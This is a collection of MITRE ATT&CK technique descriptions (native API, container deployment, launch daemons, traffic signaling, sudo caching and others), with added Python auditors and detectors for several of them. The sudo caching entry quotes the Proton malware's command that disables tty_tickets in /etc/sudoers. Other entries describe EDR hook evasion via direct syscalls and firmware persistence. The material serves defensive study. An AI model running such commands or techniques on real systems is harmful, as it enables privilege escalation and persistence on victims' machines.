Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.

Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.

Native API functions (such as <code>NtCreateProcess</code>) may be directly invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)

Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)

Adversaries may use assembly to directly or indirectly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001).

The tag is: misp-galaxy:mitre-attack-pattern="Native API - T1106"

Table 6193. Table References

Links

http://msdn.microsoft.com/en-us/library/ms682425

https://attack.mitre.org/techniques/T1106

https://developer.apple.com/documentation/coreservices

https://developer.apple.com/documentation/foundation

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1

https://docs.microsoft.com/en-us/windows/win32/api/

https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework

https://man7.org/linux/man-pages//man7/libc.7.html

https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/

https://redops.at/en/blog/direct-syscalls-vs-indirect-syscalls

https://undocumented.ntinternals.net/

https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/

https://www.gnu.org/software/libc/

https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html

https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html

https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/

Deploy Container - T1610

Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.

Containers can be deployed by various means, such as via Docker’s <code>create</code> and <code>start</code> APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)
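
A defender-side check for the configuration the passage describes ("without network rules, user limitations, etc.") can be expressed against the body a client sends to the Docker Engine's container-create endpoint. The following is an added example, not code from ATT&CK, Docker or Kubernetes: it audits a POST /containers/create body and lists the isolation controls it leaves out. The two request bodies are constructed for the example; the field names (Image, User, HostConfig.Privileged, NetworkMode, PidMode, CapAdd, Binds) are the Engine API's, and the lists of sensitive host paths and dangerous capabilities are the author's choices.

```python
# Added example, not code from ATT&CK, Docker or Kubernetes: audit a Docker Engine
# container-create request body for missing isolation controls. Field names follow the
# Engine API's container-create schema; the path and capability lists are assumptions.
import json

# Host paths whose bind mount hands the container control of the host (author's list).
SENSITIVE_HOST_PATHS = ("/var/run/docker.sock", "/etc", "/root", "/proc", "/sys", "/boot")
DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "NET_ADMIN", "DAC_READ_SEARCH"}


def _is_sensitive_mount(host_src):
    src = host_src.rstrip("/") or "/"
    if src == "/":
        return True
    return any(src == p or src.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)


def audit_create_request(body):
    """Return a list of findings for one container-create body (dict or JSON string)."""
    if isinstance(body, (str, bytes)):
        body = json.loads(body)
    host = body.get("HostConfig") or {}
    findings = []
    if host.get("Privileged"):
        findings.append("Privileged: every capability and host device, default seccomp/AppArmor off")
    if host.get("NetworkMode") == "host":
        findings.append("NetworkMode=host: shares the host network stack, no network rules apply")
    if host.get("PidMode") == "host":
        findings.append("PidMode=host: can see and signal every host process")
    if not body.get("User"):
        findings.append("no User: the container's processes run as uid 0")
    for cap in host.get("CapAdd") or []:
        if cap.upper().replace("CAP_", "") in DANGEROUS_CAPS:
            findings.append("CapAdd %s: capability that defeats isolation" % cap)
    for bind in host.get("Binds") or []:
        src = bind.split(":", 1)[0]
        if _is_sensitive_mount(src):
            findings.append("Binds %s: sensitive host path mounted into the container" % src)
    return findings


if __name__ == "__main__":
    # Constructed request: what an adversary deploying a "no limits" container sends.
    evasive = {"Image": "alpine", "HostConfig": {"Privileged": True, "NetworkMode": "host",
               "Binds": ["/var/run/docker.sock:/var/run/docker.sock"]}}
    for finding in audit_create_request(evasive):
        print("-", finding)
```

The same checks apply to the Kubernetes pod spec behind the dashboard or Kubeflow (hostNetwork, hostPID, securityContext.privileged, runAsUser, hostPath volumes), where an admission controller is the natural place to run them.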

The tag is: misp-galaxy:mitre-attack-pattern="Deploy Container - T1610"

Table 6194. Table References

Links

https://attack.mitre.org/techniques/T1610

https://blog.aquasec.com/malicious-container-image-docker-container-host

https://docs.docker.com/engine/api/v1.41/#tag/Container

https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/

https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/

Launch Daemon - T1160

Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in <code>/System/Library/LaunchDaemons</code> and <code>/Library/LaunchDaemons</code> (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).

Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software (Citation: WireLurker). Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root.

The plist file must be owned by root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon’s executable and gain persistence or Privilege Escalation.
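
The two rules above (plist owned by root:wheel, target program not writable by anyone else) are straightforward to audit. The following is an added example, not code from ATT&CK or Apple: it reads a LaunchDaemon plist with plistlib, resolves the program it launches, and reports ownership and writability problems on both files, plus a job whose program does not exist yet (a path an adversary can simply create). The sample job written by write_sample_job() is constructed; the audit function works on any plist path.

```python
# Added example, not code from ATT&CK or Apple: audit one LaunchDaemon job against the
# passage's rules: plist owned by root:wheel, program owned by root and not group/world
# writable, program present. write_sample_job() only builds a constructed sample.
import os
import plistlib
import stat

GROUP_OR_WORLD_WRITABLE = stat.S_IWGRP | stat.S_IWOTH


def daemon_program(plist_path):
    """Return (Label, executable) for a launchd job: Program, else ProgramArguments[0]."""
    with open(plist_path, "rb") as fh:
        job = plistlib.load(fh)
    program = job.get("Program") or (job.get("ProgramArguments") or [None])[0]
    return job.get("Label"), program


def audit_launch_daemon(plist_path, root_uid=0, wheel_gid=0):
    """Return a list of findings; an empty list means the job passes every check."""
    findings = []
    st = os.stat(plist_path)
    if (st.st_uid, st.st_gid) != (root_uid, wheel_gid):
        findings.append("plist not owned by root:wheel (uid=%d gid=%d)" % (st.st_uid, st.st_gid))
    if st.st_mode & GROUP_OR_WORLD_WRITABLE:
        findings.append("plist writable by group/others")

    label, program = daemon_program(plist_path)
    if not program:
        findings.append("%s: no Program or ProgramArguments" % label)
        return findings
    if not os.path.isabs(program):
        findings.append("%s: relative program path %r" % (label, program))
    try:
        pst = os.stat(program)
    except FileNotFoundError:
        findings.append("%s: program %s does not exist, so whoever can create it owns a root job"
                        % (label, program))
        return findings
    if pst.st_uid != root_uid:
        findings.append("%s: program %s not owned by root" % (label, program))
    if pst.st_mode & GROUP_OR_WORLD_WRITABLE:
        findings.append("%s: program %s writable by group/others; a writer runs as root at next load"
                        % (label, program))
    return findings


def write_sample_job(directory, label, program):
    """Write a minimal constructed LaunchDaemon plist and return its path."""
    path = os.path.join(directory, label + ".plist")
    with open(path, "wb") as fh:
        plistlib.dump({"Label": label, "ProgramArguments": [program], "RunAtLoad": True}, fh)
    return path


if __name__ == "__main__":
    for daemon_dir in ("/System/Library/LaunchDaemons", "/Library/LaunchDaemons"):
        if os.path.isdir(daemon_dir):
            for name in sorted(os.listdir(daemon_dir)):
                if name.endswith(".plist"):
                    for finding in audit_launch_daemon(os.path.join(daemon_dir, name)):
                        print("%s/%s: %s" % (daemon_dir, name, finding))
```

Run as root on a Mac it walks both daemon directories; the findings about the program file are the ones that matter for the escalation path in the passage, since launchd will run whatever is at that path as root regardless of who last wrote it.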

The tag is: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1160"

Table 6195. Table References

Links

https://attack.mitre.org/techniques/T1160

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

File Deletion - T1107

Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces that indicate what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary’s footprint.

There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)

The tag is: misp-galaxy:mitre-attack-pattern="File Deletion - T1107"

Table 6196. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/

https://attack.mitre.org/techniques/T1107

Redundant Access - T1108

This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.

Adversaries may use more than one remote access tool with varying command and control protocols or credentialed access to remote services so they can maintain access if an access mechanism is detected or mitigated.

If one type of tool is detected and blocked or removed as a response but the organization did not gain a full understanding of the adversary’s tools and access, then the adversary will be able to retain access to the network. Adversaries may also attempt to gain access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use [External Remote Services](https://attack.mitre.org/techniques/T1133) such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network.(Citation: Mandiant APT1) Adversaries may also retain access through cloud-based infrastructure and applications.

Use of a [Web Shell](https://attack.mitre.org/techniques/T1100) is one such way to maintain access to a network through an externally accessible Web server.

The tag is: misp-galaxy:mitre-attack-pattern="Redundant Access - T1108"

Table 6197. Table References

Links

https://attack.mitre.org/techniques/T1108

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Component Firmware - T1109

Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1019) but conducted upon other system components that may not have the same capability or level of integrity checking. Malicious device firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.

The tag is: misp-galaxy:mitre-attack-pattern="Component Firmware - T1109"

Table 6198. Table References

Links

https://attack.mitre.org/techniques/T1109

https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html

https://www.smartmontools.org/

System Firmware - T1019

The BIOS (Basic Input/Output System) and the Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

System firmware like BIOS and (U)EFI underlie the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.

The tag is: misp-galaxy:mitre-attack-pattern="System Firmware - T1019"

Table 6199. Table References

Links

http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html

http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about

http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research

http://www.uefi.org/about

https://attack.mitre.org/techniques/T1019

https://capec.mitre.org/data/definitions/532.html

https://en.wikipedia.org/wiki/BIOS

https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface

https://github.com/chipsec/chipsec

https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/

Data Encrypted - T1022

Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.

Other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)

The tag is: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1022"

Table 6200. Table References

Links

http://www.netsec.colostate.edu/zhang/DetectingEncryptedBotnetTraffic.pdf

https://attack.mitre.org/techniques/T1022

https://en.wikipedia.org/wiki/List_of_file_signatures

Data Hiding - T1320

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1320).

Certain types of traffic (e.g., DNS tunneling, header inject) allow for user-defined fields. These fields can then be used to hide data. In addition to hiding data in network protocols, steganography techniques can be used to hide data in images or other file formats. Detection can be difficult unless a particular signature is already known. (Citation: BotnetsDNSC2) (Citation: HAMMERTOSS2015) (Citation: DNS-Tunnel)

The tag is: misp-galaxy:mitre-attack-pattern="Data Hiding - T1320"

Table 6201. Table References

Links

https://attack.mitre.org/techniques/T1320

Shortcut Modification - T1023

Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.

The tag is: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1023"

Table 6202. Table References

Links

https://attack.mitre.org/techniques/T1023

https://capec.mitre.org/data/definitions/132.html

Broadcast Receivers - T1402

An intent is a message passed between Android application or system components. Applications can register to receive broadcast intents at runtime, which are system-wide intents delivered to each app when certain events happen on the device, such as network changes or the user unlocking the screen. Malicious applications can then trigger certain actions within the app based on which broadcast intent was received.

Further, malicious applications can register for intents broadcasted by other applications in addition to the Android system itself. This allows the malware to respond based on actions in other applications. This behavior typically indicates a more intimate knowledge, or potentially the targeting of specific devices, users, or applications.

In Android 8 (API level 26), broadcast intent behavior was changed, limiting the implicit intents that applications can register for in the manifest. In most cases, applications that register through the manifest will no longer receive the broadcasts. Now, applications must register context-specific broadcast receivers while the user is actively using the app.(Citation: Android Changes to System Broadcasts)

The tag is: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402"

Table 6203. Table References

Links

https://attack.mitre.org/techniques/T1402

https://developer.android.com/guide/components/broadcasts#changes-system-broadcasts

User Execution - T1204

An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).

While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user’s desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).

Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204). For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)

The tag is: misp-galaxy:mitre-attack-pattern="User Execution - T1204"

Table 6204. Table References

Links

https://attack.mitre.org/techniques/T1204

https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-delivery

Task requirements - T1240

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1240).

Once divided into the most granular parts, analysts work with collection managers to task the collection management system with requirements and sub-requirements. (Citation: Heffter) (Citation: JP2-01)

The tag is: misp-galaxy:mitre-attack-pattern="Task requirements - T1240"

Table 6205. Table References

Links

https://attack.mitre.org/techniques/T1240

Traffic Signaling - T1205

Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.

Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).

The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.

On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.

Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet)
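
Both signals described above (a knock sequence against closed ports followed by a connection to the port that opens, and the Wake-on-LAN magic packet) can be recognised from network telemetry. The following is an added example, not code from ATT&CK or the cited vendors, run over constructed data: detect_knock_sequences() flags a source that hits an ordered set of closed ports within a short window and then gets an accepted connection to the opened port, and parse_magic_packet() validates a magic packet (six 0xFF bytes followed by the target MAC repeated sixteen times). The knock sequence, window, opened port and the connection-log format are assumptions made for the example.

```python
# Added example, not code from ATT&CK or the cited vendors: detect a port-knock sequence in a
# connection log and validate a Wake-on-LAN magic packet. Sequence, window, opened port and
# the log format are assumptions for the example.
from collections import defaultdict

KNOCK_SEQUENCE = (7000, 8000, 9000)   # assumed sequence the backdoor listens for
KNOCK_WINDOW_S = 10.0                 # assumed maximum spread of one knock sequence
OPENED_PORT = 2222                    # assumed port the host opens once knocked


def parse_conn_log(lines):
    """One record per line: '<epoch> <src> <dst> <dport> <REJ|OK>' (constructed format)."""
    rows = []
    for line in lines:
        if not line.strip():
            continue
        ts, src, dst, dport, outcome = line.split()
        rows.append((float(ts), src, dst, int(dport), outcome))
    return sorted(rows)


def detect_knock_sequences(rows, sequence=KNOCK_SEQUENCE, window=KNOCK_WINDOW_S, opened=OPENED_PORT):
    """Return (src, dst, first_knock_ts) for every (src, dst) pair that completes the
    sequence in order against closed ports (REJ) within `window` seconds and then gets an
    accepted connection (OK) to `opened` inside the same window."""
    hits = []
    state = defaultdict(lambda: (0, None))       # (src, dst) -> (next index, first knock ts)
    for ts, src, dst, dport, outcome in rows:
        key = (src, dst)
        idx, t0 = state[key]
        if idx == len(sequence):                 # all knocks seen: expect the door to open
            if dport == opened and outcome == "OK" and ts - t0 <= window:
                hits.append((src, dst, t0))
            state[key] = (0, None)
            continue
        if outcome == "REJ" and dport == sequence[idx] and (idx == 0 or ts - t0 <= window):
            state[key] = (idx + 1, ts if idx == 0 else t0)
        elif outcome == "REJ" and dport == sequence[0]:
            state[key] = (1, ts)                 # out of order or too slow: a fresh first knock
        else:
            state[key] = (0, None)               # anything else breaks the sequence
    return hits


def parse_magic_packet(payload):
    """Return the target MAC ('aa:bb:cc:dd:ee:ff') if payload is a magic packet: a
    synchronisation stream of six 0xFF bytes, then the MAC repeated sixteen times.
    Trailing bytes (padding) are ignored. Otherwise None."""
    if len(payload) < 102 or payload[:6] != b"\xff" * 6:
        return None
    mac = payload[6:12]
    if payload[6:102] != mac * 16:
        return None
    return ":".join("%02x" % b for b in mac)


def build_magic_packet(mac_str):
    """Constructed sample builder; a real sender puts this in a UDP broadcast."""
    mac = bytes(int(x, 16) for x in mac_str.split(":"))
    if len(mac) != 6:
        raise ValueError("need a 48-bit MAC")
    return b"\xff" * 6 + mac * 16


if __name__ == "__main__":
    sample = ["1700000000.0 10.0.0.5 10.0.0.9 7000 REJ", "1700000001.0 10.0.0.5 10.0.0.9 8000 REJ",
              "1700000002.0 10.0.0.5 10.0.0.9 9000 REJ", "1700000003.0 10.0.0.5 10.0.0.9 2222 OK"]
    print(detect_knock_sequences(parse_conn_log(sample)))
    print(parse_magic_packet(build_magic_packet("00:11:22:33:44:55")))
```

A sequential port scan does not trigger the knock detector because the hit on the port after the first knock breaks the sequence, and the final requirement of an accepted connection to the opened port keeps the detection tied to the behaviour that matters: a closed port that became reachable.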

The tag is: misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205"

Table 6206. Table References

Links

https://attack.mitre.org/techniques/T1205

https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN

https://www.amd.com/system/files/TechDocs/20213.pdf

https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/

https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631

https://www.mandiant.com/resources/synful-knock-acis

Multiband Communication - T1026

This technique has been deprecated and should no longer be used.

Some adversaries may split communications between different protocols. There could be one protocol for inbound command and control and another for outbound data, allowing it to bypass certain firewall restrictions. The split could also be random to simply avoid data threshold alerts on any one communication.

The tag is: misp-galaxy:mitre-attack-pattern="Multiband Communication - T1026"

Table 6207. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1026

Sudo Caching - T1206

The <code>sudo</code> command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments." (Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a <code>timestamp_timeout</code> that is the amount of time in minutes between instances of <code>sudo</code> before it will re-prompt for a password. This is because <code>sudo</code> has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at <code>/var/db/sudo</code> with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a <code>tty_tickets</code> variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).

Adversaries can abuse poor configurations of this to escalate privileges without needing the user’s password. <code>/var/db/sudo</code>'s timestamp can be monitored to see if it falls within the <code>timestamp_timeout</code> range. If it does, then malware can execute sudo commands without needing to supply the user’s password. When <code>tty_tickets</code> is disabled, adversaries can do this from any tty for that user.

The OSX Proton Malware has disabled <code>tty_tickets</code> to potentially make scripting easier by issuing <code>echo 'Defaults !tty_tickets' >> /etc/sudoers</code> (Citation: cybereason osx proton). In order for this change to be reflected, the Proton malware also must issue <code>killall Terminal</code>. As of macOS Sierra, the sudoers file has <code>tty_tickets</code> enabled by default.
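
The interaction of the two settings above decides what a process running as the user can do without the password. The following is an added example, not code from ATT&CK or the sudo project: a parser for the generic Defaults lines that set timestamp_timeout and tty_tickets, sudo's rule for whether a cached ticket is still valid, and the resulting exposure. The sudoers text in the demo is constructed (it includes the line Proton appends); the ticket check takes the ticket's mtime and the current time as numbers so it runs anywhere, where on macOS the mtime would come from os.stat on the user's entry under /var/db/sudo. The defaults used when no Defaults line speaks (5 minutes, tty_tickets on) are sudo's compiled-in values and are the author's statement, not the page's.

```python
# Added example, not code from ATT&CK or the sudo project: parse the sudoers Defaults that
# govern credential caching and evaluate whether a cached ticket can be reused right now.
# DEFAULT_* values are sudo's compiled-in defaults (author's statement, not the page's).
import re

DEFAULT_TIMEOUT_MINUTES = 5.0
DEFAULT_TTY_TICKETS = True
_DEFAULTS_LINE = re.compile(r"^Defaults\s+(.+)$")          # generic Defaults only
_TIMEOUT_OPT = re.compile(r"^timestamp_timeout\s*=\s*(-?\d+(?:\.\d+)?)$")


def parse_caching_defaults(sudoers_text):
    """Apply, in file order, every generic 'Defaults' line and return the resulting
    {'timestamp_timeout': minutes, 'tty_tickets': bool}. Defaults restricted to a host,
    user or command (Defaults@, Defaults:, Defaults!) are left alone."""
    cfg = {"timestamp_timeout": DEFAULT_TIMEOUT_MINUTES, "tty_tickets": DEFAULT_TTY_TICKETS}
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = _DEFAULTS_LINE.match(line)
        if not m:
            continue
        for opt in (o.strip() for o in m.group(1).split(",")):
            if opt == "tty_tickets":
                cfg["tty_tickets"] = True
            elif opt == "!tty_tickets":
                cfg["tty_tickets"] = False
            else:
                t = _TIMEOUT_OPT.match(opt)
                if t:
                    cfg["timestamp_timeout"] = float(t.group(1))
    return cfg


def ticket_is_valid(ticket_mtime, now, timeout_minutes):
    """sudo's rule: a negative timeout never expires, 0 always re-prompts, otherwise the
    ticket is good for timeout_minutes after it was last touched (never from the future)."""
    if timeout_minutes < 0:
        return True
    if timeout_minutes == 0:
        return False
    age = now - ticket_mtime
    return 0 <= age <= timeout_minutes * 60


def cache_exposure(cfg, ticket_mtime, now):
    """What code running as the user can do at `now` without knowing the password."""
    if not ticket_is_valid(ticket_mtime, now, cfg["timestamp_timeout"]):
        return "none: ticket expired, sudo will prompt"
    if cfg["tty_tickets"]:
        return "sudo without password from the tty that earned the ticket only"
    return "sudo without password from any tty or with no tty at all"


if __name__ == "__main__":
    sample = ("Defaults env_reset, timestamp_timeout=15\n"
              "Defaults !tty_tickets   # constructed: the line Proton appends\n")
    cfg = parse_caching_defaults(sample)
    print(cfg, "->", cache_exposure(cfg, ticket_mtime=1000.0, now=1000.0 + 10 * 60))
```

Auditing for the Proton change is then a matter of running parse_caching_defaults over /etc/sudoers and the files under /etc/sudoers.d and alerting when tty_tickets comes back False or timestamp_timeout is negative.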

The tag is: misp-galaxy:mitre-attack-pattern="Sudo Caching - T1206"

Table 6208. Table References

Links

https://attack.mitre.org/techniques/T1206

https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does

https://www.sudo.ws/

Time Providers - T1209

The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)

Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\</code>. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)

Adversaries may abuse this architecture to establish Persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)
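
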